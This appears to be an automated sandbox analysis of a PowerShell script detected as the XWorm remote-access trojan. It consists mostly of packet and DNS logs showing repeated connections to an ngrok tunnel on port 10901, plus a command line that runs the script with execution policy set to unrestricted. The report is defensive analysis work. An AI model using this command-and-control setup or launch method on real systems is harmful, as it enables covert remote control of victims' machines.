                                                                                      Jan 30, 2025 10:37:42.672493935 CET109015766518.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:42.777019024 CET5766510901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:42.781806946 CET109015766518.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:42.808274984 CET5766510901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:42.813157082 CET109015766518.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:44.211123943 CET109015766518.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:44.211190939 CET5766510901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:47.981359005 CET5766510901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:47.984342098 CET5766610901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:47.986167908 CET109015766518.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:48.004143953 CET109015766618.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:48.004282951 CET5766610901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:48.077176094 CET5766610901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:48.082011938 CET109015766618.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:49.308326960 CET5766610901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:49.313152075 CET109015766618.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:49.339999914 CET5766610901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:49.344815016 CET109015766618.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:49.648435116 CET109015766618.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:49.648494959 CET5766610901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:54.432982922 CET5766610901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:37:54.437942982 CET109015766618.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:37:54.453933954 CET5766710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:37:54.458838940 CET109015766718.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:37:54.459284067 CET5766710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:37:54.557818890 CET5766710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:37:54.562720060 CET109015766718.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:37:54.995685101 CET5766710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:37:55.000650883 CET109015766718.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:37:56.105164051 CET109015766718.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:37:56.105251074 CET5766710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:37:59.573793888 CET5766710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:37:59.576157093 CET5766810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:37:59.580737114 CET109015766718.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:37:59.584726095 CET109015766818.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:37:59.584825993 CET5766810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:37:59.628803015 CET5766810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:37:59.633883953 CET109015766818.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:37:59.871062994 CET5766810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:37:59.876085043 CET109015766818.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:01.227205038 CET109015766818.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:01.227269888 CET5766810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:04.651842117 CET5766810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:04.653728008 CET5766910901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:04.656755924 CET109015766818.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:04.658597946 CET109015766918.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:04.660706043 CET5766910901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:04.912641048 CET5766910901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:04.917548895 CET109015766918.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:05.121000051 CET5766910901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:05.125981092 CET109015766918.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:06.289416075 CET109015766918.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:06.291167021 CET5766910901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:09.948702097 CET5766910901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:09.951306105 CET5767010901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:09.953552008 CET109015766918.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:09.956108093 CET109015767018.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:09.956181049 CET5767010901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:10.192672014 CET5767010901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:10.197665930 CET109015767018.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:11.602144003 CET109015767018.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:11.602204084 CET5767010901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:15.417479038 CET5767010901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:15.420582056 CET5767110901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:15.422338009 CET109015767018.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:15.425482988 CET109015767118.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:15.425549030 CET5767110901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:15.466865063 CET5767110901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:15.471852064 CET109015767118.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:17.057416916 CET109015767118.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:17.057521105 CET5767110901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:20.556529999 CET5767110901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:20.559832096 CET5767210901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:20.561393023 CET109015767118.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:20.564656019 CET109015767218.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:20.564728975 CET5767210901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:20.767353058 CET5767210901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:20.772161007 CET109015767218.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:22.214958906 CET109015767218.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:22.218981028 CET5767210901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:25.839349985 CET5767210901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:25.840858936 CET5767310901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:25.844319105 CET109015767218.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:25.845885992 CET109015767318.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:25.845977068 CET5767310901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:25.921814919 CET5767310901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:25.926717043 CET109015767318.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:25.995872021 CET5767310901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:26.002348900 CET109015767318.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:26.058334112 CET5767310901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:26.064897060 CET109015767318.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:26.073956013 CET5767310901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:26.080418110 CET109015767318.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:27.402332067 CET5767310901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:27.407309055 CET109015767318.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:27.479413033 CET109015767318.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:27.479471922 CET5767310901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:32.402349949 CET5767310901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:32.403395891 CET5767410901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:32.407423019 CET109015767318.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:32.408319950 CET109015767418.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:32.408441067 CET5767410901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:32.552517891 CET5767410901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:32.557720900 CET109015767418.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:34.055593014 CET109015767418.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:34.056797981 CET5767410901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:37.855010986 CET5767410901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:37.857455015 CET5767510901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:37.859930992 CET109015767418.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:37.862251043 CET109015767518.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:37.862937927 CET5767510901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:37.910545111 CET5767510901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:37.915415049 CET109015767518.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:38.011377096 CET5767510901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:38.016355038 CET109015767518.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:38.214618921 CET5767510901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:38.219605923 CET109015767518.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:38.245779991 CET5767510901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:38.250662088 CET109015767518.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:39.493108988 CET109015767518.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:39.493257999 CET5767510901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:43.293766975 CET5767510901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:43.293795109 CET5767610901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:43.298882008 CET109015767518.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:43.298899889 CET109015767618.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:43.299048901 CET5767610901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:43.371170998 CET5767610901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:43.376213074 CET109015767618.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:44.946768999 CET109015767618.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:44.946824074 CET5767610901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:48.495614052 CET5767610901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:48.497935057 CET5767710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:48.500524998 CET109015767618.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:48.502808094 CET109015767718.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:48.502870083 CET5767710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:48.535140038 CET5767710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:48.539998055 CET109015767718.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:48.558352947 CET5767710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:48.563124895 CET109015767718.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:50.167699099 CET109015767718.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:50.167841911 CET5767710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:53.652710915 CET5767710901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:53.656716108 CET5767810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:53.657668114 CET109015767718.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:53.661721945 CET109015767818.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:53.664792061 CET5767810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:53.883095980 CET5767810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:53.888130903 CET109015767818.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:53.904707909 CET5767810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:53.909569025 CET109015767818.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:55.311453104 CET109015767818.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:55.311568975 CET5767810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:58.933492899 CET5767810901192.168.2.718.197.239.5
                                                                                      Jan 30, 2025 10:38:58.938402891 CET109015767818.197.239.5192.168.2.7
                                                                                      Jan 30, 2025 10:38:58.946693897 CET5767910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:38:58.951543093 CET109015767918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:38:58.951606989 CET5767910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:38:58.986691952 CET5767910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:38:58.991472006 CET109015767918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:38:58.996093988 CET5767910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:38:59.001015902 CET109015767918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:38:59.996691942 CET5767910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:00.002202988 CET109015767918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:00.606966972 CET109015767918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:00.607036114 CET5767910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:04.292625904 CET5767910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:04.294785976 CET5768010901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:04.297729969 CET109015767918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:04.299712896 CET109015768018.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:04.299797058 CET5768010901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:04.330831051 CET5768010901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:04.335834980 CET109015768018.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:04.433383942 CET5768010901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:04.438373089 CET109015768018.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:04.464713097 CET5768010901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:04.470155001 CET109015768018.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:04.667781115 CET5768010901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:04.672800064 CET109015768018.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:05.245850086 CET5768010901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:05.250842094 CET109015768018.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:05.951605082 CET109015768018.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:05.951697111 CET5768010901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:09.685322046 CET5768110901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:09.685401917 CET5768010901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:09.691145897 CET109015768118.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:09.691160917 CET109015768018.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:09.691807985 CET5768110901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:09.741091967 CET5768110901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:09.745975018 CET109015768118.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:11.322204113 CET109015768118.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:11.322284937 CET5768110901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:15.129206896 CET5768110901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:15.134715080 CET109015768118.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:15.134875059 CET5768210901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:15.140153885 CET109015768218.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:15.144715071 CET5768210901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:15.944771051 CET5768210901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:15.949714899 CET109015768218.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:16.774224043 CET109015768218.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:16.774285078 CET5768210901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:21.089592934 CET5768210901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:21.092289925 CET5768310901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:21.094626904 CET109015768218.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:21.097206116 CET109015768318.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:21.097290039 CET5768310901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:21.136751890 CET5768310901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:21.141609907 CET109015768318.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:23.121028900 CET5768310901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:23.391454935 CET109015768318.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:23.391479015 CET109015768318.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:23.391552925 CET109015768318.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:23.391551971 CET5768310901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:23.391551971 CET5768310901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:23.391628981 CET5768310901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:23.393574953 CET109015768318.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:23.433222055 CET5768310901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:23.566592932 CET109015768318.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:23.566611052 CET109015768318.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:23.566625118 CET109015768318.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:23.566637039 CET109015768318.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:28.121970892 CET5768410901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:28.126914024 CET109015768418.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:28.126986027 CET5768410901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:28.153206110 CET5768410901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:28.163665056 CET109015768418.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:29.781505108 CET109015768418.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:29.781636000 CET5768410901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:35.340419054 CET5768510901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:35.340424061 CET5768410901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:35.345963955 CET109015768418.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:35.345977068 CET109015768518.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:35.346126080 CET5768510901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:35.357016087 CET5768510901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:35.362478018 CET109015768518.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:36.980582952 CET109015768518.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:36.980777979 CET5768510901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:42.761590004 CET5768510901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:42.762521029 CET5768610901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:42.766438961 CET109015768518.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:42.767414093 CET109015768618.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:42.767535925 CET5768610901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:42.779767036 CET5768610901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:42.784558058 CET109015768618.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:44.419195890 CET109015768618.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:44.419290066 CET5768610901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:46.261502981 CET5768610901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:46.262667894 CET5768710901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:46.266328096 CET109015768618.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:46.267430067 CET109015768718.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:46.267699957 CET5768710901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:46.276721001 CET5768710901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:46.281562090 CET109015768718.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:47.902784109 CET109015768718.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:47.902956963 CET5768710901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:50.667932034 CET5768710901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:50.671227932 CET5768810901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:50.672914028 CET109015768718.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:50.676090956 CET109015768818.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:50.676306009 CET5768810901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:50.688138962 CET5768810901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:50.692985058 CET109015768818.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:52.306368113 CET109015768818.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:52.306462049 CET5768810901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:56.230230093 CET5768810901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:56.231309891 CET5768910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:56.235234022 CET109015768818.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:56.236200094 CET109015768918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:56.236273050 CET5768910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:56.249556065 CET5768910901192.168.2.718.192.93.86
                                                                                      Jan 30, 2025 10:39:56.254429102 CET109015768918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:57.889343977 CET109015768918.192.93.86192.168.2.7
                                                                                      Jan 30, 2025 10:39:57.889481068 CET5768910901192.168.2.718.192.93.86
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 30, 2025 10:35:21.972789049 CET5695753192.168.2.71.1.1.1
                                                                                      Jan 30, 2025 10:35:21.983191967 CET53569571.1.1.1192.168.2.7
                                                                                      Jan 30, 2025 10:35:48.939321995 CET5361641162.159.36.2192.168.2.7
                                                                                      Jan 30, 2025 10:35:49.445229053 CET5523553192.168.2.71.1.1.1
                                                                                      Jan 30, 2025 10:35:49.452373981 CET53552351.1.1.1192.168.2.7
                                                                                      Jan 30, 2025 10:35:51.624041080 CET5406353192.168.2.71.1.1.1
                                                                                      Jan 30, 2025 10:35:51.643030882 CET53540631.1.1.1192.168.2.7
                                                                                      Jan 30, 2025 10:36:53.950140953 CET5162153192.168.2.71.1.1.1
                                                                                      Jan 30, 2025 10:36:53.958761930 CET53516211.1.1.1192.168.2.7
                                                                                      Jan 30, 2025 10:37:54.435703039 CET6210253192.168.2.71.1.1.1
                                                                                      Jan 30, 2025 10:37:54.452755928 CET53621021.1.1.1192.168.2.7
                                                                                      Jan 30, 2025 10:38:58.936367989 CET5099853192.168.2.71.1.1.1
                                                                                      Jan 30, 2025 10:38:58.945949078 CET53509981.1.1.1192.168.2.7

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 30, 2025 10:35:21.972789049 CET192.168.2.71.1.1.10x2c11Standard query (0)2.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                                      Jan 30, 2025 10:35:49.445229053 CET192.168.2.71.1.1.10x5819Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                      Jan 30, 2025 10:35:51.624041080 CET192.168.2.71.1.1.10x498aStandard query (0)2.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                                      Jan 30, 2025 10:36:53.950140953 CET192.168.2.71.1.1.10x56c2Standard query (0)2.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                                      Jan 30, 2025 10:37:54.435703039 CET192.168.2.71.1.1.10xd940Standard query (0)2.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                                      Jan 30, 2025 10:38:58.936367989 CET192.168.2.71.1.1.10xbcf6Standard query (0)2.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 30, 2025 10:35:21.983191967 CET1.1.1.1192.168.2.70x2c11No error (0)2.tcp.eu.ngrok.io3.126.37.18A (IP address)IN (0x0001)false
                                                                                      Jan 30, 2025 10:35:49.452373981 CET1.1.1.1192.168.2.70x5819Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                      Jan 30, 2025 10:35:51.643030882 CET1.1.1.1192.168.2.70x498aNo error (0)2.tcp.eu.ngrok.io3.127.138.57A (IP address)IN (0x0001)false
                                                                                      Jan 30, 2025 10:36:53.958761930 CET1.1.1.1192.168.2.70x56c2No error (0)2.tcp.eu.ngrok.io18.157.68.73A (IP address)IN (0x0001)false
                                                                                      Jan 30, 2025 10:37:54.452755928 CET1.1.1.1192.168.2.70xd940No error (0)2.tcp.eu.ngrok.io18.197.239.5A (IP address)IN (0x0001)false
                                                                                      Jan 30, 2025 10:38:58.945949078 CET1.1.1.1192.168.2.70xbcf6No error (0)2.tcp.eu.ngrok.io18.192.93.86A (IP address)IN (0x0001)false

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      050100150200s020406080100

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      050100150200s0.0020406080100MB

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      • File
                                                                                      • Registry
                                                                                      • Network

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:04:35:15
                                                                                      Start date:30/01/2025
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1"
                                                                                      Imagebase:0x7ff741d30000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
